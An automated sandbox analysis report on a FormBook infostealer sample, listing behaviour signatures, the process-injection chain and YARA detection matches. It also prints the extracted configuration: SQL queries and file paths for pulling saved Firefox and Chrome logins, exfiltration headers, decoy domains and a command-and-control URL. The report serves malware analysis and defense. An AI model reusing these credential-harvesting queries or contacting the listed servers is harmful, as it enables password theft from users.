Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.Packed2.42783.14936.6333

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Packed2.42783.14936.6333 (renamed file extension from 6333 to exe)
Analysis ID:344595
MD5:25fcc01067cabbf5d1aa3a2f8b18ed50
SHA1:9f45d2e8e415ab38f42e4edb9b503ce82fed2402
SHA256:ba4721d93c056ef1763667732344fdc82066d71f0003e18ad03f6d93307b82fe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.Packed2.42783.14936.exe (PID: 5980 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe' MD5: 25FCC01067CABBF5D1AA3A2F8B18ED50)
    • AddInProcess32.exe (PID: 6476 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 3476 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5992 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 2896 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WerFault.exe (PID: 7108 cmdline: C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • SearchUI.exe (PID: 960 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • SearchUI.exe (PID: 6652 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x99bf", "KEY1_OFFSET 0x1e3ca", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1e4d3", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1cfa3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x3a0289d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d719b", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad011e04", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "whatchicken.com", "sarayatalk.com", "madammomala.info", "himizoli.pro", "korobkapaket.ltda", "amd-investissement.com", "southerneclipse2024.com", "g2vies.com", "roseyogacoach.com", "allprounlimted.com", "medicaresbenefit.com", "castagno.info", "showcertificates.com", "cheapcraftbeer.com", "roxorsuperstore.info", "ossierugs.com", "honeyandtuelle.com", "wotulove.com", "infomgt.net", "pinknadeboutique.com", "tophamfardy.com", "henry-app.com", "power2bank.com", "estivalconsultancy.com", "anyagenxy.com", "woomentrend.com", "cherishfloraldesign.com", "euroqq.info", "techologytestinginc.com", "jokerwirewheels.com", "bucklandnewton.net", "owldrinktothat.com", "laceystrucking.com", "englishprotips.com", "0852qcw.com", "joebowmanforlafayette.com", "mystrandnews.com", "1980vallejo.com", "miramelfruits.com", "jollfree.com", "renttoowngenius.com", "nepali-rudraksha.com", "chloeboinnot.com", "doitimpex.online", "edu4go.com", "gvanmp.com", "furnacerepairtacoma.net", "myfreecopyright.info", "listenmelody.com", "cbothwelltest2020081703.com", "bblfz.com", "baanboosakorn.com", "ancident.com", "serenityhomedits.com", "distinctivewearstore.com", "qianyin1b.com", "ywf-lishui.com", "luohu666.com", "studiocitylandscapedesigner.com", "thesunchronical.com", "6pbusiness.com", "shortsscape.com", "nbgurki.com", "smoothsailingexpress.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theprintshop.ink/bsl/\u0000"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_7abfb1f1fbdbd7c2322150249348b63f54b8a170_10665708_1ba816b7\Report.werSUSP_WER_Critical_HeapCorruptionDetects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)Florian Roth
  • 0xd6:$a1: ReportIdentifier=
  • 0x158:$a1: ReportIdentifier=
  • 0x63a:$a2: .Name=Fault Module Name
  • 0x7e8:$s1: c0000374

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.AddInProcess32.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99bf", "KEY1_OFFSET 0x1e3ca", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1e4d3", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1cfa3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x3a0289d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d719b", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad011e04", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeVirustotal: Detection: 28%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeJoe Sandbox ML: detected
          Source: 1.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: CapabilityAccessManagerClient.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: authui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, mstsc.exe
          Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000000.675621631.0000000000712000.00000002.00020000.sdmp, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
          Source: Binary string: LanguageOverlayUtil.pdb}S source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: SLC.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows.pdblR5 source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
          Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: StructuredQuery.pdbYS` source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Signals.pdbiS0 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: d3d10warp.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: grooveex.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: windows.ui.xaml.pdb6u source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryBroker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WindowsCodecs.pdb)Sp source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb| source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
          Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: NotificationControllerPS.pdbyS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
